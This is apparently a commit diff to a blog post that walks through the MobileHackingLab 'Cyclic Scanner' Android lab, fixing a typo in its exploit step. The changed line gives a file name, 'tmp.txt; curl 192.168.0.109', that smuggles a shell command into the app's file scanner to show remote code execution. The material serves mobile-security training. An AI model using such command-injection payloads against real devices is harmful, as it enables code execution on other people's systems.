thanks Faruk Arslan for pointing out the typo in the payload

Bernasv · Apr 16, 2024 · f1bb4a9 · f1bb4a9
1 parent 64cd820
commit f1bb4a9
Showing 1 changed file with 2 additions and 2 deletions.
diff --git a/_posts/2024-04-06-cyclic-scanner.md b/_posts/2024-04-06-cyclic-scanner.md
@@ -374,7 +374,7 @@ Herein lies a critical discovery: within the `scanFile` function, there exists a
 
 ### Exploiting the Application
 
-To exploit this vulnerability, simply activate the service by toggling the switch. The service will commence scanning through files. All that's required is to have a file on the device named `tmp.txt; curl http://192.168.0.109`, triggering the desired code execution.
+To exploit this vulnerability, simply activate the service by toggling the switch. The service will commence scanning through files. All that's required is to have a file on the device named `tmp.txt; curl 192.168.0.109`, triggering the desired code execution.
 
 Start the server:
 
@@ -390,4 +390,4 @@ Now, launch the application, and we'll observe the connection confirming the rem
 
 ### Conclusion
 
-This lab underscores the mechanics of Android services and how they can be exploited by attackers to achieve remote code execution. A vulnerable handler within a service can compromise a device. For hands-on experience with these concepts, visit the [MobileHackingLab - Cyclic Scanner](https://www.mobilehackinglab.com/course/lab-cyclic-scanner) lab, where you can embark on a journey to bolster your expertise in mobile security.
+This lab underscores the mechanics of Android services and how they can be exploited by attackers to achieve remote code execution. A vulnerable handler within a service can compromise a device. For hands-on experience with these concepts, visit the [MobileHackingLab - Cyclic Scanner](https://www.mobilehackinglab.com/course/lab-cyclic-scanner) lab, where you can embark on a journey to bolster your expertise in mobile security.